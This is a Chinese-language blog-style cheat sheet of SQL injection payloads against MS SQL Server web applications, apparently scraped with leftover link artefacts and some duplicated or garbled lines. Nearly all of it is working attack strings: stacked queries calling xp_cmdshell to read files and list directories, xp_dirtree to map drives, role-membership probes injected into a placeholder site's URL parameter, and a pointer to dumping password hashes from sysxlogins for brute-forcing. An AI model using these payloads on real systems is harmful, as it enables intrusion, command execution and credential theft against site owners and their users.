SQL注入旁注精华

这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:

  得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。

  遍历目录的方法:

  先创建一个临时表:temp

 

5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

5';insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构,并寸入temp表中

5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看某个文件的内容

5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--

5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--

5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc'

5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- (xp_dirtree适用权限PUBLIC)

写入表:

语句1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

语句2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

语句3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

语句4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

语句5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

语句6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

语句7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

语句8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

语句9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--

把路径写到表中去:

_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-

_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert  dirs exec master.dbo.xp_dirtree 'c:/'-

_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-

语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--

语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:/web'--

语句:_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)

没有更多推荐了,返回首页